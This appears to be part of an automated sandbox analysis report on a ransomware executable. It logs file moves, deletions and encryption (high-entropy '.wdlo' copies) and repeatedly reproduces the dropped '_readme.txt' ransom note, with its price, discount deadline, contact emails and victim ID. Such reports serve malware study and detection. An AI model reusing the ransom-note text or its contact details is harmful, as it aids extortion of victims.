          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile moved: C:\Users\user\Desktop\UNKRLCVOHV\AQRFEVRTGL.pdfJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile deleted: C:\Users\user\Desktop\UNKRLCVOHV\AQRFEVRTGL.pdfJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile moved: C:\Users\user\Desktop\BWDRWEEARI.pngJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile deleted: C:\Users\user\Desktop\BWDRWEEARI.pngJump to behavior
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile moved: C:\Users\user\Desktop\LIJDSFKJZG.xlsxJump to behavior
          Writes a notice file (html or txt) to demand a ransom
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile dropped: C:\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-0s984cq4b3price of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@sysmail.chreserve e-mail address to contact us:supportsys@airmail.ccyour personal id:0430jijdmi0fxruhvihm5xsi9icg243ympjqd748ocimkyjt1Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile dropped: C:\$WinREAgent\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-0s984cq4b3price of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@sysmail.chreserve e-mail address to contact us:supportsys@airmail.ccyour personal id:0430jijdmi0fxruhvihm5xsi9icg243ympjqd748ocimkyjt1Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile dropped: C:\$WinREAgent\Scratch\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-0s984cq4b3price of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@sysmail.chreserve e-mail address to contact us:supportsys@airmail.ccyour personal id:0430jijdmi0fxruhvihm5xsi9icg243ympjqd748ocimkyjt1Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-0s984cq4b3price of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@sysmail.chreserve e-mail address to contact us:supportsys@airmail.ccyour personal id:0430jijdmi0fxruhvihm5xsi9icg243ympjqd748ocimkyjt1Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile dropped: C:\Users\jones\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.you can get and look video overview decrypt tool:https://we.tl/t-0s984cq4b3price of private key and decrypt software is $980.discount 50% available if you contact us first 72 hours, that's price for you is $490.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@sysmail.chreserve e-mail address to contact us:supportsys@airmail.ccyour personal id:0430jijdmi0fxruhvihm5xsi9icg243ympjqd748ocimkyjt1Jump to dropped file
          Writes many files with high entropy
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat entropy: 7.99443062578Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 entropy: 7.99466125861Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat entropy: 7.99563142176Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl entropy: 7.99782439811Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog_Old.etl entropy: 7.99730005623Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001b.db entropy: 7.99850725482Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db entropy: 7.99767856051Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db entropy: 7.9984888404Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl entropy: 7.99295191759Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\AppData\Local\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db-shm entropy: 7.99326930172Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml entropy: 7.99762174227Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db entropy: 7.9937003779Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.session64 entropy: 7.99730238552Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1258.log entropy: 7.99548185471Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html entropy: 7.998348597Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1258c.log entropy: 7.99822296772Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1309.log entropy: 7.99881484747Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-0929a.log entropy: 7.99752330719Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-0929b.log entropy: 7.9984257285Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1000.log entropy: 7.99592505393Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\AppData\Local\Temp\jusched.log entropy: 7.99521405307Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\AppData\Local\Temp\msedge_installer.log entropy: 7.99196362736Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\AppData\Local\Temp\offline.session64 entropy: 7.997242895Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat entropy: 7.99867500042Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1 entropy: 7.99776100796Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG2 entropy: 7.99564979321Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\AppData\Local\IconCache.db entropy: 7.99261836314Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm entropy: 7.99491483911Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl entropy: 7.99723158727Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin entropy: 7.99750939418Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db entropy: 7.99641934254Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db entropy: 7.99267480155Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db entropy: 7.99256097276Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db entropy: 7.99243186231Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db entropy: 7.99214110433Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx entropy: 7.99694567122Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt entropy: 7.99467420521Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db entropy: 7.99214277282Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.session64 entropy: 7.99748161354Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Temp\chrome.exe entropy: 7.99874483292Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Temp\user-PC-20231005-0843.log entropy: 7.9951062179Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Temp\user-PC-20231005-0844.log entropy: 7.99808596454Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\AppData\Local\Temp\offline.session64 entropy: 7.99733108112Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\IconCache.db.wdlo (copy) entropy: 7.99261836314Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Temp\10f5ef49-b826-4bae-a469-4fe1cdaa885f.tmp.wdlo (copy) entropy: 7.99118329559Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Temp\18e190413af045db88dfbd29609eb877.db.wdlo (copy) entropy: 7.99214277282Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Temp\18e190413af045db88dfbd29609eb877.db.session64.wdlo (copy) entropy: 7.99748161354Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Temp\chrome.exe.wdlo (copy) entropy: 7.99874483292Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Temp\user-PC-20231005-0843.log.wdlo (copy) entropy: 7.9951062179Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Temp\user-PC-20231005-0844.log.wdlo (copy) entropy: 7.99808596454Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Temp\offline.session64.wdlo (copy) entropy: 7.99733108112Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Temp\wct228B.tmp.wdlo (copy) entropy: 7.9969375331Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Temp\wct4054.tmp.wdlo (copy) entropy: 7.99716052123Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Temp\wct7120.tmp.wdlo (copy) entropy: 7.99755146279Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Temp\wctB366.tmp.wdlo (copy) entropy: 7.9971080753Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\18e190413af045db88dfbd29609eb877.db.wdlo (copy) entropy: 7.9937003779Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\18e190413af045db88dfbd29609eb877.db.session64.wdlo (copy) entropy: 7.99730238552Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\DESKTOP-AGET0TR-20231003-1258.log.wdlo (copy) entropy: 7.99548185471Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\DESKTOP-AGET0TR-20231003-1258c.log.wdlo (copy) entropy: 7.99822296772Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\DESKTOP-AGET0TR-20231003-1309.log.wdlo (copy) entropy: 7.99881484747Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\DESKTOP-AGET0TR-20231004-0929a.log.wdlo (copy) entropy: 7.99752330719Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\DESKTOP-AGET0TR-20231004-0929b.log.wdlo (copy) entropy: 7.9984257285Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\DESKTOP-AGET0TR-20231004-1000.log.wdlo (copy) entropy: 7.99592505393Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\jusched.log.wdlo (copy) entropy: 7.99521405307Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\msedge_installer.log.wdlo (copy) entropy: 7.99196362736Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\offline.session64.wdlo (copy) entropy: 7.997242895Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\wct150C.tmp.wdlo (copy) entropy: 7.99782292002Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\wct38F0.tmp.wdlo (copy) entropy: 7.99772536422Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\wct49A7.tmp.wdlo (copy) entropy: 7.9973879445Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\wctAB5F.tmp.wdlo (copy) entropy: 7.99762176683Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\wctDB2E.tmp.wdlo (copy) entropy: 7.99734681618Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\wctE4A4.tmp.wdlo (copy) entropy: 7.99732766941Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\Temp\wctEA40.tmp.wdlo (copy) entropy: 7.99763554306Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx.wdlo (copy) entropy: 7.99694567122Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.wdlo (copy) entropy: 7.99467420521Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Temp\scoped_dir5952_991612011\10f5ef49-b826-4bae-a469-4fe1cdaa885f.tmp.wdlo (copy) entropy: 7.9911293116Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\jones\Local Settings\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db-shm.wdlo (copy) entropy: 7.99326930172Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.wdlo (copy) entropy: 7.99750939418Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.wdlo (copy) entropy: 7.99641934254Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.wdlo (copy) entropy: 7.99267480155Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.wdlo (copy) entropy: 7.99256097276Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.wdlo (copy) entropy: 7.99243186231Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.wdlo (copy) entropy: 7.99214110433Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001b.db.wdlo (copy) entropy: 7.99850725482Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db.wdlo (copy) entropy: 7.99767856051Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.wdlo (copy) entropy: 7.9984888404Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.wdlo (copy) entropy: 7.99295191759Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Shell\DefaultLayouts.xml.wdlo (copy) entropy: 7.99762174227Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html.wdlo (copy) entropy: 7.998348597Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy) entropy: 7.99867500042Jump to dropped file
          Source: C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeFile created: C:\Users\user\Local Settings\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\Settings\settings.dat.LOG1.wdlo (copy) entropy: 7.99776100796Jump to dropped file
